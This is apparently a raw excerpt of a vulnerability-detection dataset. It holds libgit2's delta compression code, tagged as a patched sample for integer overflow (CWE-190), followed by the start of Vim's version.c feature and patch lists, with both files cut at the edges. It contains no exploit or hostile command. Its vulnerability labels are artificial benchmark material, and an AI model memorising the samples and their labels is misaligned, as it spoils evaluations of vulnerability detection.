0x4bac4176, 0x3519617b, 0x1d9fb5bd, 0x632a95b0, 0x42eea6bf, 0x3c5b86b2,
0x14dd5274, 0x6a687279, 0x45d0fbf8, 0x3b65dbf5, 0x13e30f33, 0x6d562f3e,
0x506b692d, 0x2ede4920, 0x06589de6, 0x78edbdeb, 0x5755346a, 0x29e01467,
0x0166c0a1, 0x7fd3e0ac, 0x5e17d3a3, 0x20a2f3ae, 0x08242768, 0x76910765,
0x59298ee4, 0x279caee9, 0x0f1a7a2f, 0x71af5a22, 0x7560f609, 0x0bd5d604,
0x235302c2, 0x5de622cf, 0x725eab4e, 0x0ceb8b43, 0x246d5f85, 0x5ad87f88,
0x7b1c4c87, 0x05a96c8a, 0x2d2fb84c, 0x539a9841, 0x7c2211c0, 0x029731cd,
0x2a11e50b, 0x54a4c506, 0x69998315, 0x172ca318, 0x3faa77de, 0x411f57d3,
0x6ea7de52, 0x1012fe5f, 0x38942a99, 0x46210a94, 0x67e5399b, 0x19501996,
0x31d6cd50, 0x4f63ed5d, 0x60db64dc, 0x1e6e44d1, 0x36e89017, 0x485db01a,
0x3f77c841, 0x41c2e84c, 0x69443c8a, 0x17f11c87, 0x38499506, 0x46fcb50b,
0x6e7a61cd, 0x10cf41c0, 0x310b72cf, 0x4fbe52c2, 0x67388604, 0x198da609,
0x36352f88, 0x48800f85, 0x6006db43, 0x1eb3fb4e, 0x238ebd5d, 0x5d3b9d50,
0x75bd4996, 0x0b08699b, 0x24b0e01a, 0x5a05c017, 0x728314d1, 0x0c3634dc,
0x2df207d3, 0x534727de, 0x7bc1f318, 0x0574d315, 0x2acc5a94, 0x54797a99,
0x7cffae5f, 0x024a8e52, 0x06852279, 0x78300274, 0x50b6d6b2, 0x2e03f6bf,
0x01bb7f3e, 0x7f0e5f33, 0x57888bf5, 0x293dabf8, 0x08f998f7, 0x764cb8fa,
0x5eca6c3c, 0x207f4c31, 0x0fc7c5b0, 0x7172e5bd, 0x59f4317b, 0x27411176,
0x1a7c5765, 0x64c97768, 0x4c4fa3ae, 0x32fa83a3, 0x1d420a22, 0x63f72a2f,
0x4b71fee9, 0x35c4dee4, 0x1400edeb, 0x6ab5cde6, 0x42331920, 0x3c86392d,
0x133eb0ac, 0x6d8b90a1, 0x450d4467, 0x3bb8646a
};
struct index_entry {
const unsigned char *ptr;
unsigned int val;
struct index_entry *next;
};
struct git_delta_index {
unsigned long memsize;
const void *src_buf;
size_t src_size;
unsigned int hash_mask;
struct index_entry *hash[GIT_FLEX_ARRAY];
};
static int lookup_index_alloc(
void **out, unsigned long *out_len, size_t entries, size_t hash_count)
{
size_t entries_len, hash_len, index_len;
GITERR_CHECK_ALLOC_MULTIPLY(&entries_len, entries, sizeof(struct index_entry));
GITERR_CHECK_ALLOC_MULTIPLY(&hash_len, hash_count, sizeof(struct index_entry *));
GITERR_CHECK_ALLOC_ADD(&index_len, sizeof(struct git_delta_index), entries_len);
GITERR_CHECK_ALLOC_ADD(&index_len, index_len, hash_len);
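/*
 * index_len is built with overflow-checked arithmetic:
 *   index_len = sizeof(struct git_delta_index)
 *             + entries    * sizeof(struct index_entry)
 *             + hash_count * sizeof(struct index_entry *)
 * The GITERR_CHECK_ALLOC_* macros are assumed to bail out of this
 * function with an error if any step would overflow, so index_len
 * cannot silently wrap before it reaches git__malloc().
 */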
if (!git__is_ulong(index_len)) {
giterr_set(GITERR_NOMEMORY, "overly large delta");
return -1;
}
*out = git__malloc(index_len);
GITERR_CHECK_ALLOC(*out);
*out_len = index_len;
return 0;
}
int git_delta_index_init(
git_delta_index **out, const void *buf, size_t bufsize)
{
unsigned int i, hsize, hmask, entries, prev_val, *hash_count;
const unsigned char *data, *buffer = buf;
struct git_delta_index *index;
struct index_entry *entry, **hash;
void *mem;
unsigned long memsize;
*out = NULL;
if (!buf || !bufsize)
return 0;
/* Determine index hash size. Note that indexing skips the
first byte to allow for optimizing the rabin polynomial
initialization in create_delta(). */
entries = (unsigned int)(bufsize - 1) / RABIN_WINDOW;
if (bufsize >= 0xffffffffUL) {
/*
* Current delta format can't encode offsets into
* reference buffer with more than 32 bits.
*/
entries = 0xfffffffeU / RABIN_WINDOW;
}
hsize = entries / 4;
for (i = 4; i < 31 && (1u << i) < hsize; i++);
hsize = 1 << i;
hmask = hsize - 1;
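/*
 * Illustrative sizing: for a 1 MiB source buffer, entries is
 * (1048576 - 1) / 16 = 65535, hsize starts at entries / 4 = 16383
 * and is rounded up to the next power of two, 16384, so hmask
 * ends up as 0x3fff.
 */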
if (lookup_index_alloc(&mem, &memsize, entries, hsize) < 0)
return -1;
index = mem;
mem = index->hash;
hash = mem;
mem = hash + hsize;
entry = mem;
index->memsize = memsize;
index->src_buf = buf;
index->src_size = bufsize;
index->hash_mask = hmask;
memset(hash, 0, hsize * sizeof(*hash));
/* allocate an array to count hash entries */
hash_count = git__calloc(hsize, sizeof(*hash_count));
if (!hash_count) {
git__free(index);
return -1;
}
/* then populate the index */
prev_val = ~0;
for (data = buffer + entries * RABIN_WINDOW - RABIN_WINDOW;
data >= buffer;
data -= RABIN_WINDOW) {
unsigned int val = 0;
for (i = 1; i <= RABIN_WINDOW; i++)
val = ((val << 8) | data[i]) ^ T[val >> RABIN_SHIFT];
if (val == prev_val) {
/* keep the lowest of consecutive identical blocks */
entry[-1].ptr = data + RABIN_WINDOW;
} else {
prev_val = val;
i = val & hmask;
entry->ptr = data + RABIN_WINDOW;
entry->val = val;
entry->next = hash[i];
hash[i] = entry++;
hash_count[i]++;
}
}
/*
* Determine a limit on the number of entries in the same hash
 * bucket. This guards us against pathological data sets causing
* really bad hash distribution with most entries in the same hash
* bucket that would bring us to O(m*n) computing costs (m and n
* corresponding to reference and target buffer sizes).
*
* Make sure none of the hash buckets has more entries than
* we're willing to test. Otherwise we cull the entry list
* uniformly to still preserve a good repartition across
* the reference buffer.
*/
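/*
 * Worked example: a bucket holding 256 entries gives
 * skip = 256 / HASH_LIMIT / 2 = 2, so the relinking below keeps
 * every other node and roughly 2 * HASH_LIMIT entries survive.
 */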
for (i = 0; i < hsize; i++) {
if (hash_count[i] < HASH_LIMIT)
continue;
entry = hash[i];
do {
struct index_entry *keep = entry;
int skip = hash_count[i] / HASH_LIMIT / 2;
do {
entry = entry->next;
} while(--skip && entry);
keep->next = entry;
} while (entry);
}
git__free(hash_count);
*out = index;
return 0;
}
void git_delta_index_free(git_delta_index *index)
{
git__free(index);
}
size_t git_delta_index_size(git_delta_index *index)
{
assert(index);
return index->memsize;
}
/*
* The maximum size for any opcode sequence, including the initial header
* plus rabin window plus biggest copy.
*/
#define MAX_OP_SIZE (5 + 5 + 1 + RABIN_WINDOW + 7)
int git_delta_create_from_index(
void **out,
size_t *out_len,
const struct git_delta_index *index,
const void *trg_buf,
size_t trg_size,
size_t max_size)
{
unsigned int i, bufpos, bufsize, moff, msize, val;
int inscnt;
const unsigned char *ref_data, *ref_top, *data, *top;
unsigned char *buf;
*out = NULL;
*out_len = 0;
if (!trg_buf || !trg_size)
return 0;
bufpos = 0;
bufsize = 8192;
if (max_size && bufsize >= max_size)
bufsize = (unsigned int)(max_size + MAX_OP_SIZE + 1);
buf = git__malloc(bufsize);
GITERR_CHECK_ALLOC(buf);
/* store reference buffer size */
i = index->src_size;
while (i >= 0x80) {
buf[bufpos++] = i | 0x80;
i >>= 7;
}
buf[bufpos++] = i;
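/*
 * The size headers use a little-endian base-128 varint: 7 bits per
 * byte, high bit set on every byte except the last. A source size
 * of 300, for example, is emitted as 0xac 0x02 (0x2c + 2 * 128).
 */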
/* store target buffer size */
i = trg_size;
while (i >= 0x80) {
buf[bufpos++] = i | 0x80;
i >>= 7;
}
buf[bufpos++] = i;
ref_data = index->src_buf;
ref_top = ref_data + index->src_size;
data = trg_buf;
top = (const unsigned char *) trg_buf + trg_size;
bufpos++;
val = 0;
for (i = 0; i < RABIN_WINDOW && data < top; i++, data++) {
buf[bufpos++] = *data;
val = ((val << 8) | *data) ^ T[val >> RABIN_SHIFT];
}
inscnt = i;
moff = 0;
msize = 0;
while (data < top) {
if (msize < 4096) {
struct index_entry *entry;
val ^= U[data[-RABIN_WINDOW]];
val = ((val << 8) | *data) ^ T[val >> RABIN_SHIFT];
i = val & index->hash_mask;
for (entry = index->hash[i]; entry; entry = entry->next) {
const unsigned char *ref = entry->ptr;
const unsigned char *src = data;
unsigned int ref_size = (unsigned int)(ref_top - ref);
if (entry->val != val)
continue;
if (ref_size > (unsigned int)(top - src))
ref_size = (unsigned int)(top - src);
if (ref_size <= msize)
break;
while (ref_size-- && *src++ == *ref)
ref++;
if (msize < (unsigned int)(ref - entry->ptr)) {
/* this is our best match so far */
msize = (unsigned int)(ref - entry->ptr);
moff = (unsigned int)(entry->ptr - ref_data);
if (msize >= 4096) /* good enough */
break;
}
}
}
if (msize < 4) {
if (!inscnt)
bufpos++;
buf[bufpos++] = *data++;
inscnt++;
if (inscnt == 0x7f) {
buf[bufpos - inscnt - 1] = inscnt;
inscnt = 0;
}
msize = 0;
} else {
unsigned int left;
unsigned char *op;
if (inscnt) {
while (moff && ref_data[moff-1] == data[-1]) {
/* we can match one byte back */
msize++;
moff--;
data--;
bufpos--;
if (--inscnt)
continue;
bufpos--; /* remove count slot */
inscnt--; /* make it -1 */
break;
}
buf[bufpos - inscnt - 1] = inscnt;
inscnt = 0;
}
/* A copy op is currently limited to 64KB (pack v2) */
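/*
 * Copy opcode layout: the command byte has bit 0x80 set; bits
 * 0x01..0x08 flag which little-endian offset bytes follow and bits
 * 0x10..0x20 which size bytes follow (zero bytes are omitted).
 * Example: moff = 0x1234 and msize = 0x100 encode as
 * 0xa3 0x34 0x12 0x01.
 */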
left = (msize < 0x10000) ? 0 : (msize - 0x10000);
msize -= left;
op = buf + bufpos++;
i = 0x80;
if (moff & 0x000000ff)
buf[bufpos++] = moff >> 0, i |= 0x01;
if (moff & 0x0000ff00)
buf[bufpos++] = moff >> 8, i |= 0x02;
if (moff & 0x00ff0000)
buf[bufpos++] = moff >> 16, i |= 0x04;
if (moff & 0xff000000)
buf[bufpos++] = moff >> 24, i |= 0x08;
if (msize & 0x00ff)
buf[bufpos++] = msize >> 0, i |= 0x10;
if (msize & 0xff00)
buf[bufpos++] = msize >> 8, i |= 0x20;
*op = i;
data += msize;
moff += msize;
msize = left;
if (msize < 4096) {
int j;
val = 0;
for (j = -RABIN_WINDOW; j < 0; j++)
val = ((val << 8) | data[j])
^ T[val >> RABIN_SHIFT];
}
}
if (bufpos >= bufsize - MAX_OP_SIZE) {
void *tmp = buf;
bufsize = bufsize * 3 / 2;
if (max_size && bufsize >= max_size)
bufsize = max_size + MAX_OP_SIZE + 1;
if (max_size && bufpos > max_size)
break;
buf = git__realloc(buf, bufsize);
if (!buf) {
git__free(tmp);
return -1;
}
}
}
if (inscnt)
buf[bufpos - inscnt - 1] = inscnt;
if (max_size && bufpos > max_size) {
giterr_set(GITERR_NOMEMORY, "delta would be larger than maximum size");
git__free(buf);
return GIT_EBUFS;
}
*out_len = bufpos;
*out = buf;
return 0;
}
/*
* Delta application was heavily cribbed from BinaryDelta.java in JGit, which
* itself was heavily cribbed from <code>patch-delta.c</code> in the
* GIT project. The original delta patching code was written by
* Nicolas Pitre <nico@cam.org>.
*/
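/*
 * The two size headers at the start of a delta use the same base-128
 * varint encoding as the writer above: hdr_sz() accumulates 7 bits per
 * byte, least-significant group first, until it sees a byte with the
 * high bit clear. The bytes 0xac 0x02, for instance, decode back to
 * 44 + (2 << 7) = 300.
 */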
static int hdr_sz(
size_t *size,
const unsigned char **delta,
const unsigned char *end)
{
const unsigned char *d = *delta;
size_t r = 0;
unsigned int c, shift = 0;
do {
if (d == end) {
giterr_set(GITERR_INVALID, "truncated delta");
return -1;
}
c = *d++;
r |= (c & 0x7f) << shift;
shift += 7;
} while (c & 0x80);
*delta = d;
*size = r;
return 0;
}
int git_delta_read_header(
size_t *base_out,
size_t *result_out,
const unsigned char *delta,
size_t delta_len)
{
const unsigned char *delta_end = delta + delta_len;
if ((hdr_sz(base_out, &delta, delta_end) < 0) ||
(hdr_sz(result_out, &delta, delta_end) < 0))
return -1;
return 0;
}
#define DELTA_HEADER_BUFFER_LEN 16
int git_delta_read_header_fromstream(
size_t *base_sz, size_t *res_sz, git_packfile_stream *stream)
{
static const size_t buffer_len = DELTA_HEADER_BUFFER_LEN;
unsigned char buffer[DELTA_HEADER_BUFFER_LEN];
const unsigned char *delta, *delta_end;
size_t len;
ssize_t read;
len = read = 0;
while (len < buffer_len) {
read = git_packfile_stream_read(stream, &buffer[len], buffer_len - len);
if (read == 0)
break;
if (read == GIT_EBUFS)
continue;
len += read;
}
delta = buffer;
delta_end = delta + len;
if ((hdr_sz(base_sz, &delta, delta_end) < 0) ||
(hdr_sz(res_sz, &delta, delta_end) < 0))
return -1;
return 0;
}
int git_delta_apply(
void **out,
size_t *out_len,
const unsigned char *base,
size_t base_len,
const unsigned char *delta,
size_t delta_len)
{
const unsigned char *delta_end = delta + delta_len;
size_t base_sz, res_sz, alloc_sz;
unsigned char *res_dp;
*out = NULL;
*out_len = 0;
/*
* Check that the base size matches the data we were given;
* if not we would underflow while accessing data from the
* base object, resulting in data corruption or segfault.
*/
if ((hdr_sz(&base_sz, &delta, delta_end) < 0) || (base_sz != base_len)) {
giterr_set(GITERR_INVALID, "failed to apply delta: base size does not match given data");
return -1;
}
if (hdr_sz(&res_sz, &delta, delta_end) < 0) {
giterr_set(GITERR_INVALID, "failed to apply delta: base size does not match given data");
return -1;
}
GITERR_CHECK_ALLOC_ADD(&alloc_sz, res_sz, 1);
res_dp = git__malloc(alloc_sz);
GITERR_CHECK_ALLOC(res_dp);
res_dp[res_sz] = '\0';
*out = res_dp;
*out_len = res_sz;
while (delta < delta_end) {
unsigned char cmd = *delta++;
if (cmd & 0x80) {
/* cmd is a copy instruction; copy from the base. */
size_t off = 0, len = 0;
if (cmd & 0x01) off = *delta++;
if (cmd & 0x02) off |= *delta++ << 8UL;
if (cmd & 0x04) off |= *delta++ << 16UL;
if (cmd & 0x08) off |= ((unsigned) *delta++ << 24UL);
if (cmd & 0x10) len = *delta++;
if (cmd & 0x20) len |= *delta++ << 8UL;
if (cmd & 0x40) len |= *delta++ << 16UL;
if (!len) len = 0x10000;
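/*
 * Example: the command stream 0xa3 0x34 0x12 0x01 decodes here to
 * off = 0x1234 and len = 0x100, i.e. "copy 256 bytes starting at
 * offset 0x1234 of the base object".
 */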
if (base_len < off + len || res_sz < len)
goto fail;
memcpy(res_dp, base + off, len);
res_dp += len;
res_sz -= len;
} else if (cmd) {
/*
* cmd is a literal insert instruction; copy from
* the delta stream itself.
*/
if (delta_end - delta < cmd || res_sz < cmd)
goto fail;
memcpy(res_dp, delta, cmd);
delta += cmd;
res_dp += cmd;
res_sz -= cmd;
} else {
/* cmd == 0 is reserved for future encodings. */
goto fail;
}
}
if (delta != delta_end || res_sz)
goto fail;
return 0;
fail:
git__free(*out);
*out = NULL;
*out_len = 0;
giterr_set(GITERR_INVALID, "failed to apply delta");
return -1;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_111_0 |
crossvul-cpp_data_good_3179_1 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
#include "vim.h"
#ifdef AMIGA
# include <time.h> /* for time() */
#endif
/*
* Vim originated from Stevie version 3.6 (Fish disk 217) by GRWalter (Fred)
* It has been changed beyond recognition since then.
*
* Differences between version 7.4 and 8.x can be found with ":help version8".
* Differences between version 6.4 and 7.x can be found with ":help version7".
* Differences between version 5.8 and 6.x can be found with ":help version6".
* Differences between version 4.x and 5.x can be found with ":help version5".
* Differences between version 3.0 and 4.x can be found with ":help version4".
* All the remarks about older versions have been removed, they are not very
* interesting.
*/
#include "version.h"
char *Version = VIM_VERSION_SHORT;
static char *mediumVersion = VIM_VERSION_MEDIUM;
#if defined(HAVE_DATE_TIME) || defined(PROTO)
# if (defined(VMS) && defined(VAXC)) || defined(PROTO)
char longVersion[sizeof(VIM_VERSION_LONG_DATE) + sizeof(__DATE__)
+ sizeof(__TIME__) + 3];
void
make_version(void)
{
/*
* Construct the long version string. Necessary because
* VAX C can't catenate strings in the preprocessor.
*/
strcpy(longVersion, VIM_VERSION_LONG_DATE);
strcat(longVersion, __DATE__);
strcat(longVersion, " ");
strcat(longVersion, __TIME__);
strcat(longVersion, ")");
}
# else
char *longVersion = VIM_VERSION_LONG_DATE __DATE__ " " __TIME__ ")";
# endif
#else
char *longVersion = VIM_VERSION_LONG;
#endif
static void list_features(void);
static void version_msg(char *s);
static char *(features[]) =
{
#ifdef HAVE_ACL
"+acl",
#else
"-acl",
#endif
#ifdef AMIGA /* only for Amiga systems */
# ifdef FEAT_ARP
"+ARP",
# else
"-ARP",
# endif
#endif
#ifdef FEAT_ARABIC
"+arabic",
#else
"-arabic",
#endif
#ifdef FEAT_AUTOCMD
"+autocmd",
#else
"-autocmd",
#endif
#ifdef FEAT_BEVAL
"+balloon_eval",
#else
"-balloon_eval",
#endif
#ifdef FEAT_BROWSE
"+browse",
#else
"-browse",
#endif
#ifdef NO_BUILTIN_TCAPS
"-builtin_terms",
#endif
#ifdef SOME_BUILTIN_TCAPS
"+builtin_terms",
#endif
#ifdef ALL_BUILTIN_TCAPS
"++builtin_terms",
#endif
#ifdef FEAT_BYTEOFF
"+byte_offset",
#else
"-byte_offset",
#endif
#ifdef FEAT_JOB_CHANNEL
"+channel",
#else
"-channel",
#endif
#ifdef FEAT_CINDENT
"+cindent",
#else
"-cindent",
#endif
#ifdef FEAT_CLIENTSERVER
"+clientserver",
#else
"-clientserver",
#endif
#ifdef FEAT_CLIPBOARD
"+clipboard",
#else
"-clipboard",
#endif
#ifdef FEAT_CMDL_COMPL
"+cmdline_compl",
#else
"-cmdline_compl",
#endif
#ifdef FEAT_CMDHIST
"+cmdline_hist",
#else
"-cmdline_hist",
#endif
#ifdef FEAT_CMDL_INFO
"+cmdline_info",
#else
"-cmdline_info",
#endif
#ifdef FEAT_COMMENTS
"+comments",
#else
"-comments",
#endif
#ifdef FEAT_CONCEAL
"+conceal",
#else
"-conceal",
#endif
#ifdef FEAT_CRYPT
"+cryptv",
#else
"-cryptv",
#endif
#ifdef FEAT_CSCOPE
"+cscope",
#else
"-cscope",
#endif
#ifdef FEAT_CURSORBIND
"+cursorbind",
#else
"-cursorbind",
#endif
#ifdef CURSOR_SHAPE
"+cursorshape",
#else
"-cursorshape",
#endif
#if defined(FEAT_CON_DIALOG) && defined(FEAT_GUI_DIALOG)
"+dialog_con_gui",
#else
# if defined(FEAT_CON_DIALOG)
"+dialog_con",
# else
# if defined(FEAT_GUI_DIALOG)
"+dialog_gui",
# else
"-dialog",
# endif
# endif
#endif
#ifdef FEAT_DIFF
"+diff",
#else
"-diff",
#endif
#ifdef FEAT_DIGRAPHS
"+digraphs",
#else
"-digraphs",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_DIRECTX
"+directx",
# else
"-directx",
# endif
#endif
#ifdef FEAT_DND
"+dnd",
#else
"-dnd",
#endif
#ifdef EBCDIC
"+ebcdic",
#else
"-ebcdic",
#endif
#ifdef FEAT_EMACS_TAGS
"+emacs_tags",
#else
"-emacs_tags",
#endif
#ifdef FEAT_EVAL
"+eval",
#else
"-eval",
#endif
"+ex_extra",
#ifdef FEAT_SEARCH_EXTRA
"+extra_search",
#else
"-extra_search",
#endif
#ifdef FEAT_FKMAP
"+farsi",
#else
"-farsi",
#endif
#ifdef FEAT_SEARCHPATH
"+file_in_path",
#else
"-file_in_path",
#endif
#ifdef FEAT_FIND_ID
"+find_in_path",
#else
"-find_in_path",
#endif
#ifdef FEAT_FLOAT
"+float",
#else
"-float",
#endif
#ifdef FEAT_FOLDING
"+folding",
#else
"-folding",
#endif
#ifdef FEAT_FOOTER
"+footer",
#else
"-footer",
#endif
/* only interesting on Unix systems */
#if !defined(USE_SYSTEM) && defined(UNIX)
"+fork()",
#endif
#ifdef FEAT_GETTEXT
# ifdef DYNAMIC_GETTEXT
"+gettext/dyn",
# else
"+gettext",
# endif
#else
"-gettext",
#endif
#ifdef FEAT_HANGULIN
"+hangul_input",
#else
"-hangul_input",
#endif
#if (defined(HAVE_ICONV_H) && defined(USE_ICONV)) || defined(DYNAMIC_ICONV)
# ifdef DYNAMIC_ICONV
"+iconv/dyn",
# else
"+iconv",
# endif
#else
"-iconv",
#endif
#ifdef FEAT_INS_EXPAND
"+insert_expand",
#else
"-insert_expand",
#endif
#ifdef FEAT_JOB_CHANNEL
"+job",
#else
"-job",
#endif
#ifdef FEAT_JUMPLIST
"+jumplist",
#else
"-jumplist",
#endif
#ifdef FEAT_KEYMAP
"+keymap",
#else
"-keymap",
#endif
#ifdef FEAT_EVAL
"+lambda",
#else
"-lambda",
#endif
#ifdef FEAT_LANGMAP
"+langmap",
#else
"-langmap",
#endif
#ifdef FEAT_LIBCALL
"+libcall",
#else
"-libcall",
#endif
#ifdef FEAT_LINEBREAK
"+linebreak",
#else
"-linebreak",
#endif
#ifdef FEAT_LISP
"+lispindent",
#else
"-lispindent",
#endif
#ifdef FEAT_LISTCMDS
"+listcmds",
#else
"-listcmds",
#endif
#ifdef FEAT_LOCALMAP
"+localmap",
#else
"-localmap",
#endif
#ifdef FEAT_LUA
# ifdef DYNAMIC_LUA
"+lua/dyn",
# else
"+lua",
# endif
#else
"-lua",
#endif
#ifdef FEAT_MENU
"+menu",
#else
"-menu",
#endif
#ifdef FEAT_SESSION
"+mksession",
#else
"-mksession",
#endif
#ifdef FEAT_MODIFY_FNAME
"+modify_fname",
#else
"-modify_fname",
#endif
#ifdef FEAT_MOUSE
"+mouse",
# ifdef FEAT_MOUSESHAPE
"+mouseshape",
# else
"-mouseshape",
# endif
# else
"-mouse",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_DEC
"+mouse_dec",
# else
"-mouse_dec",
# endif
# ifdef FEAT_MOUSE_GPM
"+mouse_gpm",
# else
"-mouse_gpm",
# endif
# ifdef FEAT_MOUSE_JSB
"+mouse_jsbterm",
# else
"-mouse_jsbterm",
# endif
# ifdef FEAT_MOUSE_NET
"+mouse_netterm",
# else
"-mouse_netterm",
# endif
#endif
#ifdef __QNX__
# ifdef FEAT_MOUSE_PTERM
"+mouse_pterm",
# else
"-mouse_pterm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_SGR
"+mouse_sgr",
# else
"-mouse_sgr",
# endif
# ifdef FEAT_SYSMOUSE
"+mouse_sysmouse",
# else
"-mouse_sysmouse",
# endif
# ifdef FEAT_MOUSE_URXVT
"+mouse_urxvt",
# else
"-mouse_urxvt",
# endif
# ifdef FEAT_MOUSE_XTERM
"+mouse_xterm",
# else
"-mouse_xterm",
# endif
#endif
#ifdef FEAT_MBYTE_IME
# ifdef DYNAMIC_IME
"+multi_byte_ime/dyn",
# else
"+multi_byte_ime",
# endif
#else
# ifdef FEAT_MBYTE
"+multi_byte",
# else
"-multi_byte",
# endif
#endif
#ifdef FEAT_MULTI_LANG
"+multi_lang",
#else
"-multi_lang",
#endif
#ifdef FEAT_MZSCHEME
# ifdef DYNAMIC_MZSCHEME
"+mzscheme/dyn",
# else
"+mzscheme",
# endif
#else
"-mzscheme",
#endif
#ifdef FEAT_NETBEANS_INTG
"+netbeans_intg",
#else
"-netbeans_intg",
#endif
#ifdef FEAT_NUM64
"+num64",
#else
"-num64",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_OLE
"+ole",
# else
"-ole",
# endif
#endif
"+packages",
#ifdef FEAT_PATH_EXTRA
"+path_extra",
#else
"-path_extra",
#endif
#ifdef FEAT_PERL
# ifdef DYNAMIC_PERL
"+perl/dyn",
# else
"+perl",
# endif
#else
"-perl",
#endif
#ifdef FEAT_PERSISTENT_UNDO
"+persistent_undo",
#else
"-persistent_undo",
#endif
#ifdef FEAT_PRINTER
# ifdef FEAT_POSTSCRIPT
"+postscript",
# else
"-postscript",
# endif
"+printer",
#else
"-printer",
#endif
#ifdef FEAT_PROFILE
"+profile",
#else
"-profile",
#endif
#ifdef FEAT_PYTHON
# ifdef DYNAMIC_PYTHON
"+python/dyn",
# else
"+python",
# endif
#else
"-python",
#endif
#ifdef FEAT_PYTHON3
# ifdef DYNAMIC_PYTHON3
"+python3/dyn",
# else
"+python3",
# endif
#else
"-python3",
#endif
#ifdef FEAT_QUICKFIX
"+quickfix",
#else
"-quickfix",
#endif
#ifdef FEAT_RELTIME
"+reltime",
#else
"-reltime",
#endif
#ifdef FEAT_RIGHTLEFT
"+rightleft",
#else
"-rightleft",
#endif
#ifdef FEAT_RUBY
# ifdef DYNAMIC_RUBY
"+ruby/dyn",
# else
"+ruby",
# endif
#else
"-ruby",
#endif
#ifdef FEAT_SCROLLBIND
"+scrollbind",
#else
"-scrollbind",
#endif
#ifdef FEAT_SIGNS
"+signs",
#else
"-signs",
#endif
#ifdef FEAT_SMARTINDENT
"+smartindent",
#else
"-smartindent",
#endif
#ifdef STARTUPTIME
"+startuptime",
#else
"-startuptime",
#endif
#ifdef FEAT_STL_OPT
"+statusline",
#else
"-statusline",
#endif
#ifdef FEAT_SUN_WORKSHOP
"+sun_workshop",
#else
"-sun_workshop",
#endif
#ifdef FEAT_SYN_HL
"+syntax",
#else
"-syntax",
#endif
/* only interesting on Unix systems */
#if defined(USE_SYSTEM) && defined(UNIX)
"+system()",
#endif
#ifdef FEAT_TAG_BINS
"+tag_binary",
#else
"-tag_binary",
#endif
#ifdef FEAT_TAG_OLDSTATIC
"+tag_old_static",
#else
"-tag_old_static",
#endif
#ifdef FEAT_TAG_ANYWHITE
"+tag_any_white",
#else
"-tag_any_white",
#endif
#ifdef FEAT_TCL
# ifdef DYNAMIC_TCL
"+tcl/dyn",
# else
"+tcl",
# endif
#else
"-tcl",
#endif
#ifdef FEAT_TERMGUICOLORS
"+termguicolors",
#else
"-termguicolors",
#endif
#if defined(UNIX)
/* only Unix can have terminfo instead of termcap */
# ifdef TERMINFO
"+terminfo",
# else
"-terminfo",
# endif
#else /* unix always includes termcap support */
# ifdef HAVE_TGETENT
"+tgetent",
# else
"-tgetent",
# endif
#endif
#ifdef FEAT_TERMRESPONSE
"+termresponse",
#else
"-termresponse",
#endif
#ifdef FEAT_TEXTOBJ
"+textobjects",
#else
"-textobjects",
#endif
#ifdef FEAT_TIMERS
"+timers",
#else
"-timers",
#endif
#ifdef FEAT_TITLE
"+title",
#else
"-title",
#endif
#ifdef FEAT_TOOLBAR
"+toolbar",
#else
"-toolbar",
#endif
#ifdef FEAT_USR_CMDS
"+user_commands",
#else
"-user_commands",
#endif
#ifdef FEAT_WINDOWS
"+vertsplit",
#else
"-vertsplit",
#endif
#ifdef FEAT_VIRTUALEDIT
"+virtualedit",
#else
"-virtualedit",
#endif
"+visual",
#ifdef FEAT_VISUALEXTRA
"+visualextra",
#else
"-visualextra",
#endif
#ifdef FEAT_VIMINFO
"+viminfo",
#else
"-viminfo",
#endif
#ifdef FEAT_VREPLACE
"+vreplace",
#else
"-vreplace",
#endif
#ifdef FEAT_WILDIGN
"+wildignore",
#else
"-wildignore",
#endif
#ifdef FEAT_WILDMENU
"+wildmenu",
#else
"-wildmenu",
#endif
#ifdef FEAT_WINDOWS
"+windows",
#else
"-windows",
#endif
#ifdef FEAT_WRITEBACKUP
"+writebackup",
#else
"-writebackup",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_X11
"+X11",
# else
"-X11",
# endif
#endif
#ifdef FEAT_XFONTSET
"+xfontset",
#else
"-xfontset",
#endif
#ifdef FEAT_XIM
"+xim",
#else
"-xim",
#endif
#ifdef WIN3264
# ifdef FEAT_XPM_W32
"+xpm_w32",
# else
"-xpm_w32",
# endif
#else
# ifdef HAVE_XPM
"+xpm",
# else
"-xpm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef USE_XSMP_INTERACT
"+xsmp_interact",
# else
# ifdef USE_XSMP
"+xsmp",
# else
"-xsmp",
# endif
# endif
# ifdef FEAT_XCLIPBOARD
"+xterm_clipboard",
# else
"-xterm_clipboard",
# endif
#endif
#ifdef FEAT_XTERM_SAVE
"+xterm_save",
#else
"-xterm_save",
#endif
NULL
};
static int included_patches[] =
{ /* Add new patch number below this line */
/**/
378,
/**/
377,
/**/
376,
/**/
375,
/**/
374,
/**/
373,
/**/
372,
/**/
371,
/**/
370,
/**/
369,
/**/
368,
/**/
367,
/**/
366,
/**/
365,
/**/
364,
/**/
363,
/**/
362,
/**/
361,
/**/
360,
/**/
359,
/**/
358,
/**/
357,
/**/
356,
/**/
355,
/**/
354,
/**/
353,
/**/
352,
/**/
351,
/**/
350,
/**/
349,
/**/
348,
/**/
347,
/**/
346,
/**/
345,
/**/
344,
/**/
343,
/**/
342,
/**/
341,
/**/
340,
/**/
339,
/**/
338,
/**/
337,
/**/
336,
/**/
335,
/**/
334,
/**/
333,
/**/
332,
/**/
331,
/**/
330,
/**/
329,
/**/
328,
/**/
327,
/**/
326,
/**/
325,
/**/
324,
/**/
323,
/**/
322,
/**/
321,
/**/
320,
/**/
319,
/**/
318,
/**/
317,
/**/
316,
/**/
315,
/**/
314,
/**/
313,
/**/
312,
/**/
311,
/**/
310,
/**/
309,
/**/
308,
/**/
307,
/**/
306,
/**/
305,
/**/
304,
/**/
303,
/**/
302,
/**/
301,
/**/
300,
/**/
299,
/**/
298,
/**/
297,
/**/
296,
/**/
295,
/**/
294,
/**/
293,
/**/
292,
/**/
291,
/**/
290,
/**/
289,
/**/
288,
/**/
287,
/**/
286,
/**/
285,
/**/
284,
/**/
283,
/**/
